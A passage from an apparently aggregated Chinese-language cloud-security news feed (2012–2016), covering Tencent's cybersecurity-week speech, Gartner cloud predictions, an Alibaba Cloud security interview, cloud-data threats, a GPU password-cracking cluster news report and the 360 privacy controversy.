在《烧脑24小时之迷雾中的黑影》剧中,电商平台就以接入腾讯云安全服务的方式,成功阻截不法分子,挽回损失。未来,腾讯云希望通过与企业和政府携手并肩,打造真正安全、智能、便利的云端安全生态。

附:《烧脑24小时之迷雾中的黑影》观看地址:http://v.qq.com/x/page/z0329h8uxy0.html

News stories from Monday 19 September, 2016

Favicon for 云安全 17:59 腾讯副总裁马斌:腾讯专注做好连接器 呼吁全民共建网络安全 » Post from 云安全 Visit off-site link

第三届国家网络安全宣传周于2016年9月19日至25日在湖北武汉举办,拥有超8亿用户并在安全领域耕耘17年的腾讯公司亮相网络安全宣传周,携手知道创宇,向公众展示最强安全生态矩阵,包括安全产品利器、安全生态平台、安全联合实验室、大数据监控、守护大使等,其中腾讯安全联合实验室、麒麟伪基站实时监测系统、腾讯守护者计划等最新安全矩阵也悉数亮相并首次对公众开放。18日下午,腾讯副总裁马斌现身安全周官方媒体发布会并发表演说,呼吁全民共建网络安全生态,打击网络安全威胁。

(腾讯副总裁马斌发表演说) 

马斌表示:“有数据显示,当前手机用户已超过7亿,平均每个人使用手机的时长超过4.5小时,到2020年,超千亿的智能设备将产生10万亿的数据。未来从互联网到移动互联网发展最终的业态一定是数据化、可视化并且共享化,而安全一定是所有一切的基石。”

马斌称,目前腾讯QQ帐号用户数8.99亿,微信用户数8.06亿,是中国拥有用户数最多的互联网公司之一,保护数亿网民的安全是责任也是义务,同时也是维护网络安全的表现形式之一。一直以来,腾讯专注做好连接器,安全是做好连接器的重要一环,为此腾讯打造了安全矩阵。

在用户安全保护方面,腾讯电脑管家、腾讯手机管家现已成为保护国民网络安全的标准配置。在今年苹果秋季发布会上,腾讯手机管家成为首个苹果推荐的第三方安全软件。随着iOS10正式版的全面推送,腾讯手机管家iPhone最新版本已在App Store上架,对于亿万中国iPhone用户,未来大量已被标识为骚扰或诈骗电话的来电将提前被拦截掉。

当前,电信网络诈骗无疑是影响和威胁用户使用安全的最大毒瘤。早前腾讯率先联手银行、警方、运营商、手机厂商、电子市场、安全厂商等产业链上企事业单位开放合作,共同组建安全联盟,在2013年推出“天下无贼反信息诈骗联盟”已逐步由“警企民”协作的1.0防御体系升级至涵盖“虚拟运营商、第三方支付平台、线上互联网交易及服务平台”的反诈骗2.0防御体系。今年腾讯推出“守护者计划”,并借助麒麟伪基站实时检测系统,通过云计算和大数据技术,打造“互联网+警务”的创新模式,助力反诈骗推行至最后一公里。

在人才战略上,今年7月,腾讯成立了国内首个互联网安全实验室矩阵——腾讯安全联合实验室,旗下涵盖科恩实验室、玄武实验室、湛泸实验室、云鼎实验室、反病毒实验室、反诈骗实验室、移动安全实验室七大实验室,各实验室专注安全技术研究及安全攻防体系搭建,安全防范和保障范围覆盖了连接、系统、应用、信息、设备、云六大互联网关键领域,其中揽获2016Pwn2Own世界冠军的腾讯联合战队成员都参与了联合实验室的建设。未来,腾讯安全联合实验室将加大科研能力的投入,将优秀人才的能力输出产品,更好地服务用户、企业。

马斌表示,目前腾讯安全联盟成员已超百家,涵盖反诈骗、帐号安全、隐私保护、支付安全、防骚扰等诸多方面,涉及个人生活的方方面面,真正推动建立了全产业链协作、保护人人的社会安全体系。未来,腾讯安全将会联合更多有能力有责任感的企业、相关政府机构和全国民众加入共建网络安全,系统综合立体式的打击网络犯罪,引导全社会共同致力维护民众安全、企业安全、国家安全。

News stories from Wednesday 02 January, 2013

Favicon for 云安全 19:14 2013云计算安全是产业关键 » Post from 云安全 Visit off-site link

Gartner预测,到2015年,10%的IT安全企业功能将通过云计算交付。在云计算安全上,目前更多倾向于通信、Web安全和远程漏洞评估,不过预计在未来将会出现诸如数据丢失防护、加密、身份验证等更多的技术来支持云计算的成熟发展。

云计算安全的状况正在加速变化,这可能会影响到IT安全供应商与其增值分销商的传统业务关系。但整体趋势将推动更多托管安全服务供应商来使用云交付。另外,Gartner预测在整个2013年将会出现很多与云安全相关的合并和收购活动。

美国联邦政府正在执行所谓的FedRamp计划来适应外部联邦云服务部署,而这也将提高联邦机构对云计算服务的使用率。Gartner预测,到2016年,公共云基础设施成为“关键国家基础设施法规”的主题。

Gartner指出,越来越多的人使用云计算,而其缺点是服务连续性有待提升,在过去几年中,我们见到过各种服务中断,这些中断可能会带来“瀑布”效应,影响成千上万的企业。

Gartner对IT安全的预测不仅仅是关于云计算和IT安全。网络虚拟化正处于持续转型阶段,Gartner预测,到2015年,20%的VPN/防火墙市场将被部署为管理程序上的虚拟交换机,而不是作为物理安全设备。

在评估云安全时需要考虑到的事实是,许多服务提供商仍然还是刚刚进入云市场,很多进入企业云计算市场的新建立的公司、甚至某些老企业以前并没有相关的IT、数据管理或安全经验。”一家伊利诺伊州绍姆堡的IT服务供应商Prescient Solutions的首席信息官杰里·欧文说。

“这样一来,没有到少云计算知识背景的用户和许多中小型企业寻找购买简单的云服务商品,就只会比较系统的定价和一些华而不实的功能,而不是云计算的安全性、容错性和完整性等必要功能。”欧文说。

更好的部署云安全的提示清单

1. 了解自己的和你的云提供商的基础设施。您对于您的供应商的设置了解得越少,您就越容易陷入被动。

2. 询问您的安全和法律团队审查与您的云服务供应商所签订的合同。确认其对于安全保证具有法律约束力。

3. 研究你供应商的服务水平协议。确保您可以监控您的应用程序,同时在发生安全漏洞的事件时服务供应商会第一时间通知你。

4. 在订立合同时,咨询供应商的相关雇用政策和雇员监察的做法,因为内部人员的恶意攻击往往就意味着安全风险。

5. 研究安全控制方案,并确保云提供商在恰当的地方进行有效控制。另外,了解供应商如何处理违规行为。

6. 要知道您的企业对于系统的保密性和完整性负有最终责任。如果可能的话,在供应商的帮助下定期进行基于云系统的渗透测试,识别漏洞。

7. 部署自己的安全工具,如复杂的密码,数据加密和数据访问管理软件,集成云基础设施。

针对所有移动到云计算中的IT资产、移动系统、应用程序或数据定​​义完整的风险环境。风险评估不仅包括节约成本或相关的移动支出,同时也包括潜在的损失和停工时间所带来的影响,关键业务系统或机密的信息,如财务数据和知识产权可能过于敏感,不适合移动到可以公开访问的云计算系统中。对云计算供应商来说,需要更勤奋地了解现有的架构的缺点。”吉尔莫说。“虽然涉及到一个快速的部署解决方案,我也相信供应商需要对他们的客户进行尽职的调查,确保相关数据和资源的安全和可靠。

本文来自:机房360

News stories from Monday 17 December, 2012

Favicon for 云安全 17:42 访沈锡镛:阿里云与谷歌、亚马逊拥有平等的安全话语权 » Post from 云安全 Visit off-site link

一流企业做标准,二流企业做品牌,三流企业做产品”,响亮的口号驱动着一代代企业在追求标准的路上前赴后继 。这其中,也包含刚刚通过由BSI(英国标准协会)审核的ISO27001:2005(信息安全管理体系)认证,成为BSI在国内审核通过ISO27001的第一家云计算安全服务提供商的阿里云。对于这家拥有广泛知名度,却是云安全领域不折不扣的新兵,外界对其知之甚少。为此,CSDN特别专访了阿里集团安全部安全研究中心安全专家沈锡镛,请他详细剖析了阿里云安全对国内安全现状的认知,如何做到与谷歌、亚马逊一样在国际安全标准方面的平等话语权,并详细介绍了阿里云安全模型的技术特点以及未来发展方向。

沈锡镛 ,云计算安全的专家及先行者,在云计算安全管理方面有很多分享。2012年加入阿里巴巴集团,着力于帮助快速成长但缺乏标准化管理的云计算领域建立安全管理框架。

云端迁移是必然

CSDN:有人形容安全市场是“国内安全企业出不去,国外安全厂商进不来”的特殊市场,您怎么看?现在国内安全市场整体发展态势如何?

沈锡镛:这样的观点并不全面。国内安全企业做的好,就能走出去;国外安全厂商也能走进来。从安全上看,国内政策法规并没有明确约束。这是空间,更是机遇。事实上,现在传统安全企业都逐步向敏捷交付转型,从成本和业务扩展考虑也在尝试在云端提供安全即服务(Security as a Service)。从产品到方案再到安全规范和标准,安全企业或许会逐步过渡到云端,为更多用户提供灵活性和专业的安全服务。

CSDN:阿里云在其中的机遇在哪里?

沈锡镛:国内云安全市场中,阿里云比较另类。因为大多传统安全公司不提供云计算服务,而提供云计算服务的企业中又没有像阿里云如此专业化的安全服务能力。这就凸现了阿里云安全的机遇。首先,阿里云安全会与阿里集团的业务紧紧的绑定,将技术与服务策划做的更圆满;其次,跳出企业级安全老三样(防火墙,防病毒软件,入侵检测)的限制,从需求出发的重回安全控制本身,从云端协议、网络控制和隔离等安全方面做新设置;第三,帮助更多中小站长以及如浙江台风系统,CCTV5等企业将应用迁移到云端,实现安全新防护。

CSDN:阿里云的定位是平台,会将更多空间留给开发者。但安全本身作为一种应用模式,如何来为开发者预留空间?

沈锡镛:首先,阿里云作为一个平台,一个生态圈,保证这个生态圈的繁荣和安全是我们不能回避的责任,而安全可以说是云生态健康成长的核心要素。其次阿里的安全团队是以服务客户为第一目标,结合我们十年安全攻防经验,打造云生态圈中的安全生命链。在这个过程中我们定位在基础安全服务提供商,帮助云生态圈中的广大中小网站和各行业用户免除安全后顾之忧,让他们可以全心全意投入到网站运营建设中。

阿里云安全生态链的打造过程中我们愿意借助云计算这个产业创新契机,我们不但希望专业的安全服务商借助我们的生态链中向广大客户提供更加精细化、定制化的安全服务,同时希望联合众多的安全组织和机构一起开发具备云计算特点的云安全产业。

明年就会开始逐步开放我们的云服务市场,会邀请安全厂商进来和我们一起共建共创这个新兴的云计算安全产业,我们相信这个蛋糕远比我们现在看到的要大。

#p#争夺国际话语权#e#

争夺国际话语权

CSDN:当初为什么想申请ISO27001认证?

沈锡镛:阿里云申请ISO27001认的源动力是用户需求。企业要使用平台,并将关键数据放入云中,就需要对阿里云有所信任。如果构建这样的信任关系?第三方权威认证是很必要的。尽管27001并不是最贴切的云安全认证,但却是现阶段最好的选择。因为目前其是唯一的,在云计算方面得到国际认可的标准。第二,阿里云要进入国际市场,需要国际通行证,27001代表了阿里云的安全管理水平完全与国际接轨。第三,27001以风险管控为核心,对企业而言很有意义。举个例子,国外如果想看西瓜是否成熟,或许是采用切西瓜的方式,一分为二,二分为四,四分为八来看每一片是否成熟,国内更多是听敲击西瓜的声音。而将安全暴露在显微镜下,对提升安全管控的整体水平很有意义。在淘宝创历史记录的“双十一”中,几乎所有关联部门都在加班加点,但是安全团队却非常空闲。因为对于这样的日常运营,安全方面已经实现了自动化流程。不需要人工投入,只需要关注自动化安全架构运行不出差错即可。阿里云安全已经到了厂商级,这也是我们的底气所在。通过ISO认证,阿里云安全无论是在技术框架,还是在内部管理矩阵及管理工具和平台上,都与业务和技术做了密切的结合,敏捷开发,规范管理,可以与国际云计算巨头如谷歌和亚马逊一样拥有平等的话语权。

CSDN:阿里云对安全有着很重的紧迫感,为什么?

沈锡镛:重量级云计算企业已经加快了进入中国的步伐,挑战迫在眉睫。国内企业往往习惯先做事,再定规则。但是国际惯例正好相反。国内企业在这方面,有着很多痛苦的案例。所以,我们认为,只有先拥有话语权,才能有更好的空间来发展。通过ISO,对于2009年正式成立的,刚刚三岁的阿里云而言,确实非常困难。但是这样也帮助我们从开发到产品交互,再到内部管理都更加规范,成为样板才能更具竞争力。

CSDN:通过认证后,阿里云安全下一阶段的目标是什么?

沈锡镛:作为已经走在前面的企业,阿里云安全会更主动地参加到一些标准和规范的制订过程中。尽管国际上已经有了一些规范与最佳实践,但是国内并不完整。阿里云安全希望构建起规范,帮助企业在迈入云端时,有着透明并易于执行的诸如配置、级别审查等规则可以遵守,云服务提供商能够更快与国际接轨。以技术规范为例,包含两方面:其一云安全联盟(CSA)的开放认证框架(OCF),其二是与CSDN合作的OCS安全中心,通过技术方+标准方来落地规范。最终达到运营上的透明和规范上的可执行等目标。此外,阿里云作为工信部云计算安全试点企业,正积极的参与到国家云计算相关标准和规范的制定中去,规范现有国内的云计算市场。

CSDN:做标准历来周折而漫长,阿里云准备怎么来做云安全规范?

沈锡镛:云安全已经看到了曙光。因为从技术上看,一种是延续Hadoop等开源方案,另一种是自主研发相关技术。但归根结底,在技术思想是一致的。安全领域也是如此。尽管国内企业与谷歌、亚马逊等还有差距,但是阿里云在安全规则制定上参与度很深,可以与之处在比较平等的量级上。此外,安全环境已经相对成熟。无论是政府,运营商还是云服务提供商以及企业用户,都希望在此方面做出更多探索。所以云计算安全规范会有不一样的局面出现。阿里云已经和百度、腾讯、360、绿盟等进行了深入交流,

CSDN:通过ISO27001认证的是阿里云的弹性计算、ODPS、RDS及云盾产品。OSS及其他服务呢?

沈锡镛:问得非常好,现在就可以直接回答,第一步通过认证的是以上4条产品线,明年的4月底和5月初我们即将接受外审的是OSS的OTS,以及云监控。

CSDN:近期国外云服务频频宕机,阿里云如何来看?

沈锡镛:在ISO对申报材料进行审核的时候,阿里云也遇到了一次机房故障。我们当时做法非常透明。故障发生1小时内,BSI打来电话询问具体的细节时,我们就开诚布公地和他们进行了沟通,BSI对我们故障的响应速度和处理的透明度表示满意。事实上,历经多年积累,对外,阿里云在和各大电信运营商的合作中已经进入共同制定运营规范的阶段,并对其具体的执行环节采取全程监控的保障措施;对内,通过自动化运营和有效的测量机制来实现量化等级评比。安全不仅是技术,同时也是责任。

#p#创新技术挑战频繁#e#

创新技术挑战频繁

CSDN:移动互联与云计算的迅猛发展将企业安全推向BYOD(分散)和数据中心(集中)。但技术层面,很多企业准备并不充分。阿里云安全如何看待新技术带来的两级化发展?

沈锡镛:与其说双级,不如说是载体的变化。移动与云计算带来的是多元化变化,这不仅是指应用场景,还有应用形态和用户心态。但与之相悖的是,安全威胁还停留在物理安全、能耗控制、安全漏洞、网络防护等传统层面,显然,安全没有随着多元化而变化。举个例子,虚拟化应用让传统信息安全的安全隔离手段面临巨大挑战,比如企业在购买云服务商虚拟服务器的同时就拥有了公网地址和云服务商的内网地址,这也就意味着用户同时拥有了云服务商的非信任域地址和信任域地址,这种网络边界的模糊化就是虚拟化技术带来的安全挑战。其次,有些安全挑战伴随着云平台的服务而随之诞生,以阿里云(开放数据处理服务)ODPS举例,该服务的设计之初是基于数据驱动的多级流水性并行计算框架,支持直接使用ODPS SQL 语句对海量数据进行离线分析。通过数据分裂将海量数据散布在整个集群内部,这样,用户的数据容量的瓶颈问题得以解决。同时计算压力也被平均分布在集群内部,很好地解决了计算性能问题。但因其允许用户通过编写程序在ODPS的集群上执行任务,这种业务模式就存在通过用户程序包含的恶意代码在ODPS的集群上植入后门,实现非法外联、提权等一系列非法操作的风险。

CSDN:从技术层面解读阿里云模型?

沈锡镛:面对虚拟化安全和云平台安全的挑战,在云时代已无法通过简单的安全设备堆砌去解决所有安全问题,同样,传统信息安全时代下的安全标准和规范也已不能从容应对上述管理挑战。为此,阿里云开发了包含3大信息安全基础控制域、7大信息安全和云计算安全支柱控制域及2大云计算安全特色控制域的阿里云安全模型(如图1所示),我们将传统信息安全管理体系中的信息安全风险管理、人力资源、物理、网络和主机安全、业务连续性和灾难恢复、数据中心运维作为云服务商的安全基线,重点评估、持续提升云服务商在虚拟化安全和云平台安全方面的安全管理和技术水平。

图1  阿里云安全模型

技术上看,云时代下的虚拟化安全主要包括虚拟服务器的隔离、虚拟服务器及镜像的加固、虚拟服务器的销毁,虽然因虚拟化服务器的服务类型的原因,以上需求已无法通过购买安全设备实现隔离,但针对用户和云服务商自身的安全需求仍可通过一系列的软件手段实现安全隔离和访问控制。

针对虚拟服务器的安全加固,可考虑通过建立安全加固流程,默认提供主机入侵检测和补丁自动更新服务等手段来保证虚拟服务器的安全;针对虚拟服务器镜像的安全加固,可在其生产流程上考虑加入安全审核环节,以保证虚拟服务器镜像能满足最新的安全要求或直接由安全部门制作安全镜像交付给运营部门,并针对用户需求有针对性的对虚拟机镜像提供加密服务;针对虚拟服务器的销毁应在其迁移后,及时消除原有物理服务器上磁盘和内存数据,使得虚拟服务器无法恢复。同时采用虚拟化在线管理系统对虚拟服务器进行管理,对物理服务器及Hypervisor的运维操作,必须遵循运维相关流程并采用实时审计技术予以监控。

虚拟服务器的隔离主要包括不同用户购买的虚拟服务器之间的隔离、虚拟服务器和其物理机之间隔离、虚拟服务器对外部入侵攻击的隔离。

针对不同用户购买的虚拟服务器之间的隔离需求,在虚拟服务器生产环节给每个虚拟服务器打上标签,在运营环节应制定不同用户之间的虚拟服务器访问规则,在技术环节应考虑采用IP 信息包过滤系统(iptables),实现虚拟服务器之间、虚拟服务器和其物理机之间隔离。

针对虚拟服务器对外部入侵攻击的隔离,应考虑采用以太网防火墙(ebtables),使虚拟服务器隔离外部公共网络的异常协议访问。 

最后,针对传统信息安全不会出现的虚拟服务器二层攻击---ARP攻击,应考虑采用上述虚拟服务器标签结合arptables,防御虚拟服务器可能发起的ARP攻击。

云时代下云平台是一切云服务的最终载体,其自身的安全态势直接决定各项云服务的正常开展, 从以上虚拟化安全的控制手段已然可以发现通过软件实现安全控制将是云安全的主要技术实现途径。而云平台自身也是软件开发的产物,由此,构建云平台安全就应从云平台的初始开发以及云服务带给云平台的安全冲击等角度予以考虑。

云平台的开发推荐参照软件安全开发周期(Security Development Lifecycle)建立安全开发流程。(如图2所示)。

图2  云平台安全开发流程

安全需求分析环节:应根据功能需求文档进行安全需求分析,针对业务内容、业务流程、技术框架进行沟通,形成《安全需求分析建议》。

安全设计环节:应根据项目特征,与测试人员沟通安全测试关键点,形成《安全测试建议》。

安全编码环节:应参考例如OWASP指南、CERT安全编码等材料编写各类《安全开发规范》,避免开发人员写出不安全的代码。 

代码审计环节:应尽可能使用代码扫描工具并结合人工代码审核,对产品代码进行白盒、黑盒扫描。 

应用渗透测试:应在上线前参照诸如OWASP之类的标准进行额外的渗透测试 。

系统发布:依据上述环节评价结果决定代码是否发布。

针对云服务对云平台的安全冲击,例如前面提到的ODPS存在通过用户程序包含的恶意代码在云服务商物理机上植入后门,实现非法外联、提权等一系列非法操作的风险,针对这类风险阿里云采用了研发虚拟化的沙箱或者解释器级别的沙箱来予以包装,并通过鉴权、授权等一整套安全措施来保证用户程序中可能包含的恶意程序无法在ODPS集群上直接执行。

采访的最后,沈锡镛对CSDN表示:“阿里云安全的定位始终不是一家纯粹的安全公司,而是更多从云安全生态链的角度来思考。给每个云计算的用户提供安心、放心、贴心的安全服务,促进云计算业务的蓬勃开展”。

本文为CSDN原创,未经允许不得转载。如需转载请联系market@csdn.net。

News stories from Wednesday 12 December, 2012

Favicon for 云安全 00:21 你的云数据的三个最大威胁 » Post from 云安全 Visit off-site link

任何恐怖电影都可以告诉你,最可怕的威胁是那些你看不到的未来。对云数据的安全来说,也是同样的道理。IT界花了数十年的时间来保护资源,但在云领域上,几乎没有谁在SaaS应用程序运行上有着十年的经验,所以我们应该提前准备一些措施。

这里描述了对云数据来说三个最大的威胁:

僵尸账户

僵尸账户是不再使用的,但是还没有被停止、取消或删除的账户。僵尸账户的危险在于,如果他们被盗,没有人及时察觉。在被察觉之前,被盗的僵尸账户可以窃取、破坏或删除数据。

防御僵尸账户:在僵尸账户打开之前消除他们。尽快删除不活动的和失去利用价值的账户。

恶意用户

用户错误永远是造成任何基于云或其他方式的应用程序数据丢失的重要原因之一。这是因为软件无法区分合法和非法的命令。简单的用户错误导致三分之一到三分之二的数据损失。这已足够吓人,但这些数字仅仅描述了以外事故所造成的损失。

现在想像一下一个流氓的用户可以对你的云数据造成的损害。授权用户,顾名思义,是可以通过你的SaaS应用防线进入内部的账户,所以心怀不满的员工可能会成为你的噩梦。

防御恶意用户:不要相信任何人。大多数SaaS应用程序提供了某种程度的分层访问权限,从来没有向任何人授权比他们需要的更大的权限。

黑天鹅

所谓“黑天鹅”,是指看似极不可能发生,但实际又发生的事件。科技作家Mat Honan今年早些时候发现亚马逊和苹果的安全程序组合使黑客几乎抹去他所有的网络账户,以及从他的笔记本电脑清除本地数据。没人会看到未来能发生什么,虽然Honan的损失不适合黑天鹅事件的经典定义,但它大致上囊括了所有不可预见的安全故障。

鉴于SaaS应用程序的复杂性和相对不成熟的云应用的安全标准,很可能会发生另一个这样的黑天鹅事件,可能危及自己的SaaS应用程序的数据。这是很形象的安全威胁,你看不到未来,没有什么比这更可怕。

黑天鹅防御:及时进行备份。单独你的SaaS数据,与云账户分开存放,可以让你从云故障中恢复。

云对大多数人来说仍然是新的领域,它需要新程序和新的最佳实践。提前进行安全准备并三思而行,云可以比内部部署系统更加灵活,并且适应性更强。但你必须去适应你的安全协议,以确保你获得的云利益不被隐藏的安全成本所消耗。(王旭东/编译 仲浩/校审)

本文来自:Network World

News stories from Monday 10 December, 2012

Favicon for 云安全 21:30 25GPU的Linux集群6小时内破解标准Windows密码 » Post from 云安全 Visit off-site link

12月10日,Ars Technica的IT安全编辑Dan Goodin的文章中提到,一个密码破解专家刚刚发布了一个计算机集群,可以循环多达3500亿每秒的测试。这是一个前所未有的速度,可以在六小时以内破解典型的商业企业中的Windows密码。

组成高性能密码破解集群的五台服务器中的一台

这五台服务器使用的是一个相对较新的包的虚拟化软件,利用25个AMD Radeon显卡来提供动力。它达到了3500亿每秒的测试,通过生成破解密码散列来破解NTLM加密算法。而NTLM加密算法是自从 Windows Server 2003以来,每一个版本都会采用的加密手段。这个Linux高性能GPU密码破解集群通过令人震惊的速度,在5.5小时完成958个组合,足以覆盖8个字符的所有密码(包含大写或小写字母、数字和符号)。而这样的密码策略在很多企业的设置中非常常见。通过微软的LM算法带来了相同的密码保护(许多组织要实现与较早Windows版本相兼容),在很短的时间内即可被破解。

基于linux的GPU集群运行的是虚拟OpenCL集群平台软件,其允许运行图形好像是运行在一台桌面电脑上。ocl-Hashcat Plus,一个免费的密码破解套件,可以优化图形计算,在集群上面运行时,允许机器至少同时运行44种其他算法。除了穷举式攻击,群集还可以使用各类技术,包括字典攻击数百万单词等来同步破解密码。

Jeremi Gosney,Stricture Consulting Group的创始人和首席执行官如此评价:“这个集群使得攻击大大加速,哈希的破解速度将是之前的4倍。”

而通过种种测试,这样的破解速度是在所谓的离线攻击下得到的。而不适用于在线攻击。事实上,GPU计算的出现,在过去十年中已经使离线密码的破译有了巨大的提高。但直到现在,由于电脑主板,BIOS系统,和最终驱动软件的限制,使得一台电脑的显卡数量最终只能在8以下。而Gosney本次的突破,是使用VCL虚拟化的结果,通过虚拟化,大量的显卡通过Linux集群实现了集合,显示出平台的巨大运算能力。

这样的破解使得更多企业担忧其密码安全。有专家建议,一般企业的密码最好不要少于9个字符,在13-20个字符比较合适。而长度之外,密码最好不要是名称、词语或常见的短语。一个简单的方法来确保密码不在上面所提到的情况,那就是选择一个随机生成的文本字符串来做使用密码,或使用密码管理程序来生成。(编译/郭雪梅,审核/仲浩)

原文链接:25-gpu-cluster-cracks-every-standard-windows-password-in-6-hours

本文为CSDN编译文章,未经允许不得转载。如需转载请联系market@csdn.net。

News stories from Friday 30 November, 2012

Favicon for 云安全 04:17 360产品被爆收集用户隐私 桌面安全路在何方 » Post from 云安全 Visit off-site link

一场由打假斗士方舟子引发的口水仗

2012年10月12日,方舟子转发了新浪微博网友 @Royflying 的爆料帖《一把菜刀:360搜集隐私程序员级分析》质疑360安全卫士搜集用户隐私。此帖指出“360安全卫士频繁上传大量的信息到服务器,会将大量用户使用其他软件的信息上传到服务器,用户无法知道上传信息的详情,也无法阻止这些信息的上传。这些信息将会暴露用户的生活习惯、作息时间,以及比较私密的软件操作。”10月29日,新浪微博用户 @独立调查员 发布长微博《公开举报奇虎360公司——致工信部、公安部公开信》,并制作了长达数小时的“解密视频”指出360安全浏览器存在的安全问题。此后《上海青年报》报道了一份由中科院保密技术攻防重点实验室研究撰写的《个人隐私泄露风险的技术研究报告》,指出奇虎360的安全卫士和安全浏览器存在安全问题。奇虎360董事长周鸿祎随即公开否认了这份报告所指出的问题,奇虎360也因此将《上海青年报》告上法庭;与此同时中科院在官方网站声明报告为内部技术交流之目的,表示保留对传播和炒作有关内容的行为追究法律责任的权利。随着事态的进一步扩大,10月25日,工信部新闻发言人、通信发展司司长张峰表示,工信部已经介入调查方舟子指控的奇虎360浏览器窃取用户隐私一事,“如果查实确有违法违规行为,将依法予以严肃处理”。11月26日,《东方早报》报道第三方民间安全组织IDF实验室发布了《关于360安全卫士涉嫌窃取用户隐私的独立检测报告》《关于360安全浏览器暗藏后门证据的独立检测报告》,两份报告再次指出奇虎360的相关产品存在严重的安全隐患。但也有媒体从业者认为金山有幕后推手的嫌疑。随着越来越多的媒体和行业及法律界人士的关注,方舟子打假360使得桌面安全问题再次走进公众视野。

实际上,在过去数月,360安全软件一直深陷安全及隐私泄漏漩涡,饱受来自网民、媒体、意见领袖和主管部门的质疑。而360方面似乎并不打算正面回应这些问题和质疑,仅仅将其归为“竞争对手迫害”,但层出不穷的真实案例,仍然引发大量用户关注并卸载360,一些世界500强企业也内部通知禁用360全系产品。根据CNZZ最新发布的数据,自方舟子开始打假360以来,360浏览器的市场份额下降了1.6%,保守估计流失用户1000万。

国外是怎么保护个人隐私的 

立法保护个人信息及隐私权是国际上通行的做法,目前世界上已有50多个国家和组织制定了个人信息保护的相关法规和标准。随着互联网等新兴通讯方式的挑战,这些法规和标准也在不断完善。

美国保护隐私权的法案早在1974年就已通过生效,2005年美国又通过一批保护个人信息的法律,如《隐私权法》、《信息保护和安全法》、《防止身份盗用法》、《网上隐私保护法》以及《消费者隐私保护法》等。2011年4月,美国一些重量级的参议员又提出关于在线综合信息保护立法的议案。在美国一些州,居民每天早晨扔在门口的垃圾袋,只能由垃圾处理公司的专用卡车运走,任何人如果未经许可擅自搬运或打开垃圾袋,都有可能面临侵犯公民隐私权的起诉。1983年加拿大颁布了《隐私权法》,此外加拿大还颁布了《个人信息保护和电子文件法》。除了联邦层面,许多省份也制订了自己的地方性隐私保护法规,其共同特点是比联邦法规更严格、细致。2010年,加拿大还通过了《电子商务保护法》,对向公众以任何形式发布广告宣传信息的行为予以严厉禁止。

欧盟在1995年通过《欧盟个人数据保护指令》,1970年德国黑森州颁布了世界上最早的旨在保护公民个人信息的《数据保护法》,1976年德国联邦政府设立的《联邦数据保护法》和各个州的数据保护法相互配合,全面保护德国公民个人信息和隐私,1978年德国联邦政府开始正式立法保护公民个人信息。法国于1978年通过《法国自由、档案、信息法》,1984年英国制订《数据保护法》。

2002年日本政府向国会提交了关于保护信息的五部法律。其中最重要的是《个人信息保护法》,该法2005年4月1日开始全面实施。在日本,任何买卖个人邮箱、电话号码、住址等都是《个人信息保护法》所禁止的。如果一所日本大学的教员想要了解学生的电话号码,就要向管理大学生个人信息的部门提交申请书,如果申请不被批准,就无法知道学生的电话号码。新加坡国会于2012年10月15日通过《个人信息保护法案》,根据该法案规定,不经许可擅自向个人号码拨打推销电话和发送信息可能会被处以100万新元(1新加坡元约合5.11元人民币)的罚款。

但在我国,针对保护个人隐私方面的法律存在空白,这也是为什么有些安全厂商敢于搜集用户隐私的原因之一。我们也看到,在欧美国家,谷歌街景的小车不小心拍了一下谁家后院,都面临被起诉甚至巨额索赔,如果我国在保护个人隐私方面有相关法律依据,也不会出现方舟子炮轰360这一出了。

360到底在用户电脑上找什么?

在我们的日常生活中,如果你去超市购物,超市一般都会推出会员卡这个东西,不少商品都有针对会员的打折,大型超市还时常有一些积分换购的奖励。而办理超市会员卡一般都是用身份证或其他有效证件,留下的个人信息常包括性别、年龄以及联系方式等。超市通过自己的进销存系统,经过一段时间的积累,便能建立一个十分有价值的顾客购买行为数据库,在通过对这个数据库的挖掘分析,便能更好地经营管理——对上游进货渠道有更好的议价权,对终端消费者有更精准的定向促销。

 

the big brother is watching you

我们不妨打个不恰当的比喻。超市记录顾客个人信息以便统计人们经常购买什么牌子和价位的物品尚无可厚非,只要他们不把个人信息用作他途。但是,如果超市用其他方法再去记录顾客买了纸巾之后是擦桌子还是擦屁股,这就有点说不过去了。在IDF实验室发布的报告中我们看到,360的安全产品在用户不知情的情况下,显然是“忠实地”记录了用户的一举一动。于是一个纳斯达克上市公司的安全软件摇身一变,成了在背后“watching you”的“the big brother”,这太讽刺了。

“总有一天,会有一个人,看你写过的所有状态,读完写的所有微博,看你从小到大的所有照片,甚至去别的地方寻找关于你的信息,试着听你听的歌,走你走过的地方,看你喜欢看的书,品尝你总是大呼好吃的东西……只是想弥补上你的青春——ta就是360spider,分布式抓取引擎!”2012年8月16日360综合搜索正式上线后,微博上曾经流传过这么一个小段子。现在你也许会发现,如果把段子中的主角换成360安全卫士,这个段子同样传神。如果你想替换更多段子中的主角,相信也不是什么难事,比如QQ

根据第三方检测机构Hitwise的数据,360综合搜索于2012年8月16日正式推出后,在不到一周的时间里,其在中国搜索市场的份额已达10%。接下来的11月28日奇虎360推出了音乐搜索服务(music.so.com),11月30日地图搜索服务(map.so.com)也正式上线。地图搜索服务上线之后,其搜索版图已经拓展至页面、新闻、问答、音乐、地图、视频六大板块。周鸿祎在公司第三季度财报会议中称,将推出搜索引擎开放平台,让高质量的垂直搜索引擎进入360搜索中。“360会在垂直内容的搜索上持开放原则,与许多合作伙伴合作,资源利用率也会比竞争对手高。”财报显示,网络广告和互联网增值服务依然是奇虎360的主要增长点。

张小龙在讲微信这款产品的时候说,做产品就是研究人性。从产品层面来说,360在下一盘很大的棋,要想下好这盘棋只有更多地了解用户的人性——从掌握用户所有的信息开始。这在侵犯用户权益的同时,也带来了巨大的安全隐患,PC桌面无需多言,如果手机桌面安全也这样的话,你的私密短信、亲朋好友的联系方式暴露无遗,犯罪分子能利用这些信息做什么就只有天知道了。然而,信任体系被破坏,受伤害最大的无疑会是国内整个安全产业。

工信部止不住的××大战

2010年11月,3Q大战爆发,亿万用户的电脑成了360与QQ的战场,最终工信部等出面叫停了这场“右下角的战争”。国内互联网一直都有着极重的江湖气息,“3Q大战”、“网易与盛大魔兽代理之争”甚至到了国家部委级层面,正是由于行业法规不健全才闹到“有关部门出面制止"的程度。

但并不是所有的“××大战”都要被否定,如今电商的价格战似乎要成为一种常态,电商价格战也不完全是口水战,我们从几次价格战中看到了线上对订单和支付等IT系统的考验,更看到了线下对仓储、物流系统的考验。从这个意义上说,正是由于"3Q大战"才催生了腾讯开放平台。360以一个挑战者的姿态出现,已经颠覆了IT安全行业的游戏规则。而中国互联网的发展显然也不是哪些部委出面制止“××大战”所能左右的。

